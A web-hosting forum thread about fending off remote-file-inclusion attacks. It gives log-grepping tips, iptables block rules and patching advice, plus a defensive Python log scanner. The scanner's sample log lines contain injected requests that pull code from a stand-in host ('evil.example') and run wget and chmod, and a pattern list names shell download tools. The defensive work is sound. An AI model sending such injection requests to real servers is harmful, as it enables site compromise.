What to do about hacked machines

Jun 22, 2005
My server is currently being attacked from a couple of already compromised servers via some kind of script that tries to upload files via a file injection bug. mod_security denies it access.

I got the file concerned (it's a txt file) from one of the compromised servers and it includes the gmail account of the twit who is attacking me.

Aside from sending him an email suggesting he go and do something slightly more productive with his life, and emailing the contacts for the compromised servers, is there anything else I could/should be doing?


Well-Known Member
Apr 27, 2006
Many forum and CMS software packages, if not updated properly, can be the cause of many vulnerabilities like remote file inclusion or MySQL injections.
You can check your /tmp directory to find if there are any executables or text files. Run /scripts/securetmp to secure the /tmp directory.
You may also search the domlogs for commands like wget, chmod, chown etc. to find the vulnerable files.
#cd /usr/local/apache/domlogs/
#grep -rl wget *
If you suspect that the machine is rooted, there is no other way than reloading the box.
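The domlogs grep above is the right instinct; as an added example (not from this thread or from cPanel), here is a small Python script that parses Apache combined-format log lines and flags requests whose query string carries a remote URL in a parameter or shell commands such as wget/chmod, then counts hits per source IP. The log lines are constructed samples, and evil.example, the IPs and the script paths are placeholders.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache "combined" log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jun/2005:10:01:12 +0000] "GET /index.php?page=news HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Jun/2005:10:02:30 +0000] "GET /forum/admin/index.php?inc=http://evil.example/cmd.txt? HTTP/1.1" 403 212 "-" "libwww-perl/5.79"
10.0.0.9 - - [22/Jun/2005:10:02:31 +0000] "GET /cms/plugin.php?file=http://evil.example/cmd.txt&cmd=wget%20http://evil.example/x;chmod%20755%20x HTTP/1.1" 403 212 "-" "libwww-perl/5.79"
10.0.0.7 - - [22/Jun/2005:10:03:00 +0000] "GET /blog/?p=http://example.org/ HTTP/1.1" 200 1000 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, request URL and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
SHELL_CMD_RE = re.compile(r'\b(wget|curl|chmod|chown|perl|lynx)\b', re.IGNORECASE)

def find_rfi_attempts(log_text):
    """Return one record per request whose query carries a remote URL or shell command."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line; skip rather than guess
        parts = urlsplit(m.group("url"))
        params = parse_qsl(parts.query, keep_blank_values=True)
        remote_params = sorted(k for k, v in params if REMOTE_SCHEME_RE.match(v))
        commands = sorted({c.lower() for c in SHELL_CMD_RE.findall(unquote(parts.query))})
        if not remote_params and not commands:
            continue
        hits.append({
            "ip": m.group("ip"),
            "script": parts.path,
            "status": int(m.group("status")),
            "remote_params": remote_params,
            "commands": commands,
            # a remote URL plus shell commands in one request is the classic RFI probe;
            # a remote URL alone may be legitimate, so rank it lower
            "severity": "high" if remote_params and commands else ("medium" if remote_params else "low"),
        })
    return hits

def offending_ips(hits):
    """Count hits per source IP: the input you want before deciding what to block or report."""
    return Counter(h["ip"] for h in hits)
```

Run it against /usr/local/apache/domlogs/* instead of SAMPLE_LOG to get the same report for your own sites; a 403 status on a flagged line means mod_security already stopped that request.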


Well-Known Member
Nov 27, 2006
These attacks are very pervasive right now. About the best you can do is complain to google and get his gmail account suspended, and advise the ISPs/hosts of the code that they've most likely been hacked.

I did that for a while, but it became too much of a hassle. The attacks aren't effective and there's no way to firewall them, since they come from many different IPs. My emails to domain owners were either ignored or got me accused of wanting to hack them/steal their identity or site content.

I have been collecting the scripts as I find new ones. I've been thinking about setting up a "blacklist" of IPs that could be null routed or firewalled. But then, I'd be in for the same kinds of fun that the email RBLs have experienced.


Jul 20, 2006
Where are these attacks coming from? Do you have IPs? Sometimes you can report them to their ISP and the ISP will kick them out; that just delays them a bit. I don't know if this is really the accepted method or not, but I usually grab the attacker's IP and add it to /etc/sysconfig/iptables:

:INPUT ACCEPT [580:46045]
-A INPUT --source hacker.ip.here -j DROP
-A INPUT --source another.bad.ip.here -j DROP
:OUTPUT ACCEPT [715:746538]

Doing this will drop all connections coming from the offending IP. The list can get pretty long, and I've been told it will slow your system if it gets too long... but so far it's been working for me. A determined hacker will hit you from a new IP... but many times they just move on to someone else. Most of these guys are just looking for a script they can compromise so they can upload a mail form and use it to sell some dick pills... so once they run into some complications they'll move on.

I've also found that mod_security keeps out a lot of problems. So just keep your ruleset up-to-date, keep cPanel up-to-date and make sure any open-source PHP or CGI scripts on your system are maintained (tall order there, sometimes), especially those that allow posting of comments or file uploads. My past problems have all resulted from some common software being left out-of-date. Hacked scripts for me personally have been Nucleus CMS, phpBB and Joomla. I also see people constantly probing for phpMyChat and phpAdsNew installations. Basically I try to stick to well-maintained scripts and then quickly apply all security updates released by the developers. From there, it's really just more of an annoyance watching these guys try to get in. Pretty aggravating for the small guys like us.